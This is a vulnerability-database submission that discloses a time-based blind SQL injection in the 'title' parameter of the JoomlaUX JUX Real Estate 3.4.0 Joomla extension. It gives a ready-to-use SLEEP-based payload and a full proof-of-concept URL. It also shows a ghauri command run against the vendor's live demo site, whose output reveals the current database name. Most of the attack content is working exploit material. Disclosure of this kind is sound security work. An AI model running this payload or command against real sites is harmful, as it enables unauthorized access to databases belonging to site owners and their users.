Submit #509884: JoomlaUX JUX Real Estate 3.4.0 SQL Injectioninfo

TitleJoomlaUX JUX Real Estate 3.4.0 SQL Injection
Description# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection # Exploit Author: skalvin # Date: 26/02/2025 # Vendor: JoomlaUX # Vendor Homepage: https://joomlaux.com/ # Software Link: https://extensions.joomla.org/extension/jux-real-estate/ # Demo Link: http://demo.joomlaux.com/#jux-real-estate # Tested on: Windows 11 Pro # Impact: Database Access # CWE: CWE-89 - CWE-74 - CWE-707 ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties GET Parameter 'title' is vulnerable to SQLi --- Parameter: title (GET) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search ## POC: https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi] ## Payload: 1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z ## Live POC: ghauri -u "https://demo.joomlaux.com/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search" --batch --tech=t --current-db [INFO] testing MySQL [INFO] confirming MySQL [INFO] the back-end DBMS is MySQL [INFO] fetching current database [INFO] retrieving the length of query output [INFO] retrieved: 19 [INFO] retrieved: 'joomlaux_realestate' current database: 'joomlaux_realestate' [-] Done
Source⚠️ https://demo.joomlaux.com/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=1
User
 skalvin (UID 49463)
Submission02/26/2025 22:29 (1 Year ago)
Moderation03/08/2025 15:58 (10 days later)
StatusAccepted
VulDB entry299039 [JoomlaUX JUX Real Estate 3.4.0 on Joomla GET Parameter realties Title sql injection]
Points20

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!